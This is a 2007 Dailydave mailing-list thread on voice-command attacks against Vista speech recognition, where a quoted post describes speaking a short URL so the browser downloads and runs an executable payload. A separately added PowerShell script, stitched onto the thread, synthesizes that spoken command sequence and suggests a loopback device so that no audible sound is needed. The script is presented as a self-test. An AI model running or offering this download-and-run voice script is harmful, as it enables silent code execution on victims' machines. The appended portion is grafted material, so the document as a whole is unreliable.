Re: [Dailydave] Vista speach recognition
From: Curt Wilson (curtw at siu.edu)
Date: Wed Jan 31 2007 - 11:16:01 CST
I've not analyzed this issue but I wonder what it might take to feed
some remotely hosted speech directly to the system as user-level
commands, bypassing the need for the sound to emerge from speakers and
be picked up by a microphone. I'd guess that higher access than a
generic user would be required for such a trick to work, such as hooking
the voice input routines (if attacker/pentester can do this, why bother
with the clumsiness of such an attack), if it would work at all.
dan at geer.org wrote:
> "George Ou" writes:
> -+-----------------
> | I just verified that TinyURL.com will give you a nice URL to an executable.
> |
> | Here's an example of a URL that opens a .EXE file.
> | http://tinyurl.com/3d588b
> |
> | Now imagine that this was actually a user-mode malicious payload that avoids
> | triggering UAC which contains ransomware. It's very easy to use Vista
> | speech command open IE7 and say "tinyURL.com/3d588b", "enter", "run". That
> | will actually download and launch your desired payload from any website and
> | TinyURL will make it easy to say. This is actually easier than my
> | successful document-deleting recycle bin emptying test because it's a
> | shorter script.
> |
>
> Spectacular!
>
> So, for two or more machines that can hear each other,
> I can make one of them tell another to do something
> naughty or perhaps I can even use the air itself as
> a not-very-covert-but-you-know-what-I-mean channel
> for moving data. Plausible deniability never had it
> so good.
>
> --dan
>
> ==========
> The Oracle:
> Of course you have. Every time you've heard someone say
> they saw a ghost, or an angel. Every story you've ever
> heard about vampires, werewolves, or aliens is the
> system assimilating some program that's doing something
> they're not supposed to be doing.
> Neo:
> Programs hacking programs...
>
--
Curt Wilson
IT Network Security Officer
Southern Illinois University Carbondale
618-453-6237
GnuPG key: http://www.infotech.siu.edu/security/curtw.pub.asc
_______________________________________________
Dailydave mailing list
Dailydave at lists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave
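As an added example that is not part of the thread and not code from any of its participants: the spoken sequence George Ou describes (open the browser, dictate a short URL, press enter, run) can be generated with the .NET System.Speech synthesizer shipped with Vista, so a tester can check whether their own machine's speech recognition acts on audio no human spoke. The exact command phrases, the 3-second pause, the placeholder URL and the loopback-device idea (which addresses Curt's question about bypassing the speaker-to-microphone path) are assumptions for illustration; the recognizer must already be enabled and listening, and the phrases it accepts depend on its command grammar.

```powershell
# Added example (not from the Dailydave thread or its authors).
# Synthesizes the voice-command sequence the thread describes so a tester can
# confirm whether Windows Speech Recognition acts on synthesized speech.
# Assumes .NET 3.0 System.Speech (present on Vista) and that speech
# recognition is turned on; command phrases below are assumptions matching
# the thread's description, not a verified copy of the recognizer's grammar.
Add-Type -AssemblyName System.Speech

# Hypothetical placeholder: use a URL you control for testing. The thread's
# TinyURL resolves to an executable and is deliberately not reused here.
$ShortUrl = "example.com/test"

$synth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$synth.Rate = -2   # slower, deliberate speech is recognized more reliably

# Path 1: play through the default audio device. This is the speakers-to-
# microphone channel Dan Geer describes ("machines that can hear each other").
$synth.SetOutputToDefaultAudioDevice()

# Path 2 (Curt's question): render to a WAV instead and play it into a
# virtual audio cable / loopback device set as the default recording device,
# so no sound has to leave the box. Assumes such a device is installed.
# $synth.SetOutputToWaveFile("$env:TEMP\voice-commands.wav")

$steps = @(
    "Start listening",          # wake the recognizer if it is sleeping
    "Open Internet Explorer",   # the thread: "open IE7"
    $ShortUrl,                  # dictated into the address bar
    "Press enter",              # the thread: "enter"
    "Run"                       # the thread: "run" at the download prompt
)

foreach ($phrase in $steps) {
    $synth.Speak($phrase)
    Start-Sleep -Seconds 3      # give the recognizer time to act on each step
}
$synth.Dispose()
```

If the recognizer follows these steps from synthesized audio, it is worth re-checking the default recording device and whether speech recognition needs to be listening at all on that machine, since the whole chain runs with the logged-in user's privileges and never touches UAC.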